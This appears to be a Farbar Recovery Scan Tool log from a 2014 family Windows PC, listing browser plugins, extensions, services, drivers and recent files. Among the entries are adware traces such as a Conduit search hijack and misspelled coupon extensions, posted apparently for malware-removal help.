SearchScopes: HKCU - DefaultScope {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
SearchScopes: HKCU - {8A64D544-98BB-C260-590A-335EB1FB0846} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
SearchScopes: HKCU - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3072253
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: No Name -> {626F3344-6A64-3995-E8E7-11D63F841162} ->  No File
BHO: No Name -> {6D5C04CD-A77C-BAB9-6494-57DA426BB009} ->  No File
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\searchplugins\bing-zugo.xml
FF Extension: ShoppperMuasteer - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net [2014-10-28]
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: SalesCeheccker - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu [2014-10-28]
FF Extension: PrriNcECoupoin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org [2014-10-28]
FF Extension: unicoupons - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-10-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-10-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-10-14]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (FineDealSoft) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\amhpndolaaocmppnmpmiaidoijofeldg [2014-10-28]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (Avast Online Security) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-10-28]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR Extension: (unicoupons) - C:\ProgramData\ojjplcdckkkbjolfbbogeibgibmedagh\ [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R2 ca82e1a5; c:\Program Files\Optimizer Pro\OptProCrashSvc.dll [186496 2014-06-15] ()
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 10:08 - 2014-11-01 10:08 - 00024453 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 10:07 - 2014-11-01 10:08 - 00000000 ____D () C:\FRST
2014-11-01 10:07 - 2014-11-01 10:07 - 01105920 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 09:52 - 2014-11-01 09:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 12:23 - 2014-10-28 12:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 21:28 - 2014-10-26 21:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 21:28 - 2014-10-26 21:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 21:28 - 2014-10-26 21:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 21:18 - 2014-10-26 21:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 20:55 - 2014-10-26 20:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 19:59 - 2014-10-26 19:59 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 18:22 - 2014-10-26 18:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 18:22 - 2014-10-26 18:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 18:44 - 2014-10-22 18:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 03:17 - 2014-06-15 15:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 03:16 - 2014-09-23 15:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 03:15 - 2014-09-23 16:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 03:15 - 2014-09-23 16:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 03:15 - 2014-09-23 16:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 03:15 - 2014-09-23 11:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 03:13 - 2014-09-27 16:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 03:03 - 2014-09-04 16:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 03:00 - 2014-09-16 09:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 21:53 - 2014-10-14 21:53 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-10-13 17:53 - 2014-10-26 19:49 - 00000000 ____D () C:\ProgramData\SaalesCheckEr
2014-10-09 08:47 - 2014-10-09 08:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 08:22 - 2014-10-09 08:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 10:06 - 2012-04-03 11:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-01 10:05 - 2010-11-20 21:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-01 10:01 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 10:01 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 09:59 - 2006-11-02 05:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-01 09:50 - 2010-11-20 20:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-01 09:33 - 2010-11-20 20:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-01 09:16 - 2013-04-10 14:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 08:52 - 2012-04-18 16:44 - 01626309 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 08:16 - 2013-04-10 14:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-11-01 04:37 - 2010-11-25 21:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-10-31 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-10-31 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 17:14 - 2014-07-06 19:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 17:02 - 2014-08-19 06:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 17:02 - 2011-08-22 17:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 12:27 - 2006-11-02 06:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 12:26 - 2006-11-02 06:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-28 12:06 - 2013-10-19 11:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 06:35 - 2010-11-21 10:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 21:54 - 2011-05-04 21:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 21:53 - 2013-04-14 19:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 21:53 - 2010-11-22 19:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 21:52 - 2014-06-03 19:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 21:30 - 2013-10-20 11:02 - 00806672 _____ () C:\Windows\PFRO.log
2014-10-26 21:28 - 2014-08-01 11:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1414816134123
2014-10-26 21:28 - 2010-11-20 20:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys.1414816134123
2014-10-26 21:28 - 2010-11-20 20:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 21:23 - 2010-12-06 17:58 - 00000000 ____D () C:\Program Files\Java
2014-10-26 21:02 - 2012-12-16 23:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 19:57 - 2012-12-14 01:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 19:56 - 2012-04-03 11:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 19:56 - 2011-08-21 09:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 19:52 - 2014-06-15 19:46 - 00000000 ____D () C:\Program Files\Optimizer Pro
2014-10-26 19:52 - 2012-10-20 19:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 19:49 - 2014-09-23 18:42 - 00000000 ____D () C:\ProgramData\SaLesChheckueR
2014-10-26 19:49 - 2014-09-04 23:21 - 00000000 ____D () C:\ProgramData\FlaashCoupon
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 03:52 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 03:38 - 2006-11-02 05:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 03:37 - 2012-04-27 19:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-21 03:12 - 2013-08-20 03:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 03:03 - 2006-11-02 03:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 09:07 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 09:06 - 2014-09-28 16:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
2014-10-09 09:01 - 2010-12-25 11:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 08:47 - 2011-01-14 21:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 08:46 - 2013-12-12 09:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

Files to move or delete:
====================
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat


Some content of TEMP:
====================
C:\Users\Bill\AppData\Local\Temp\contentDATs.exe
